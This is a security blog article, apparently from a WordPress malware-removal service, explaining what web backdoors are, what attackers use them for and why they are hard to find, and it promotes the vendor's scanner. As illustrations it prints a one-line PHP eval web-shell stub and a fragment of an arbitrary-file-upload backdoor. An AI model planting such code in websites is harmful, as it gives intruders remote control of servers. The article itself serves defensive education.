What is a backdoor?

A so-called backdoor as a computer security term refers to a communication connection feature installed in a computer (without the knowledge of others) to allow unauthorized use of a computer feature that originally used IDs and passwords to verify usage rights.
Citation Wikipedia

It is defined as.

Recently, with the popularization of WordPress, anyone can now have a powerful information dissemination medium, and a type of backdoor known as a “web backdoor,” which is installed by tampering with the program on the server, has been confirmed on many customer sites and is now raging around the world. These backdoors have been found in many customer sites and are raging around the world.


Functions of WEB backdoors

The function of a web backdoor is a file that has the ability for hackers to place arbitrary files on the server or rewrite the contents of other files.
A hacker who has taken away administrator privileges can use the file export function of WordPress to install a backdoor on the server. Through the backdoor, the hacker can perform a variety of unauthorized activities.

Send out spam e-mails
Use the backdoor as a stepping stone to attack other sites
Forwarding access to a site to another site
Mining virtual currency
Attempting to improve search rankings by linking to some other site
Operating a fraudulent site on a server

or worse, may be involved in criminal activities.

Web backdoors are difficult to detect and eliminate.

Once a site has been hacked and a backdoor has been installed, it is not easy to find the code.
This is because WordPress typically contains over 5,000 files, including themes, plugins, etc., and it does not matter which of those files the hacker knows the location of the backdoor.

In addition, most backdoors do not disappear even if WordPress is updated later or plug-ins are updated. Once the malware is removed, the backdoor remains on the server, allowing hackers to place malicious files on the server again and again.

Examples of web backdoor code

Backdoor code is often extremely simple and short. As an example, it takes the following structure

@eval($_POST["code"]);

This code would be any program that a hacker could remotely send and run on the server, and would be obfuscated to make it difficult to detect.

In some cases, a form is installed directly on the server where files can be uploaded.

<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type=" submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path']. $_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "File ". $_FILES['file']['name']. " uploaded"; }
} else {
    print "Not working: info:\n"; }
    print_r($_FILES); }
}
}
break; }
}

This code was not obfuscated and was written in extremely plain code, making it difficult to detect as a backdoor, and it was difficult even for us to detect it unless we took the difference from the original WordPress file.
(We now understand the pattern of this backdoor and can detect it.)

Web backdoors are planted in small sites.

Do you think that your site is not so popular and can’t be hacked?
Do you think so?

This is a big mistake. Hackers automatically programmatically scan a vast amount of websites for security vulnerabilities and place defaced files on even the smallest, most neglected sites.

Reference Article
8 Characteristics of Websites that can be Hacked by WordPress

If you have the authority to do what you want on a server that someone else has signed up for, you can do it anonymously, and if the site is small or abandoned, you can easily imagine the time it will take to find out about it and the technical difficulties in eliminating malware.

Please consult with WordPress Doctor for security measures for small sites, WordPress updates, and malware elimination.

Here is a scanner that WordPress Doctor has released that can detect web backdoors
WordPress Doctor: Malware Scanning Plugin

Related Posts:

  1. What many people misunderstand about WordPress security.
    We have summarized some of the security measures taken by WordPress, which are often misunderstood by many people and often result in tampering and malware embedding!...
  2. Learn how hackers rewrite (alter) files on your WordPress site to increase security!
    As convenience and site functionality increases with the improved capabilities of programs on servers, not just WordPress, tampering with files on servers has become a major problem. In this article, we will explain how hackers rewrite WordPress files and consider ways to improve security....
  3. WordPress malware Random one-byte alphanumeric folders with large numbers of HTML files hosted illegally
    This article describes this type of tampering, as there have been an increasing number of cases in which WordPress has been hacked and a large number of malicious files have been hosted in random one-byte alphanumeric folders without permission....
  4. Example of backdoor to plant malware code in $_HEADERS in WordPress
    We will explain about the type of backdoor that puts the main body of malware code in $_HEADERS, which has been increasingly detected in recent years....
  5. What to do for your site users when WordPress is hacked, tampered with, or hijacked.
    This page explains how to respond to users (those who use the site) when there is a possibility of damage to users who visit the site, such as being redirected to another site, being sent to a sweepstakes site, or downloading malicious files due to WordPress tampering. This page explains how to respond to users (those who use the site)...
  6. What are the symptoms of a WordPress hack? Here are some of the tampering details of various hackers.
    1 Back door Vulnerabilities, known as backdoors, allow hackers to install hidden entry points on your site to gain access to your WordPress site through the misuse of server privileges. Once the backdoor is exploited, the hacker can access or rewrite all files on the hosting server, or install programs. (This would compromise multiple sites hosted on the same server)....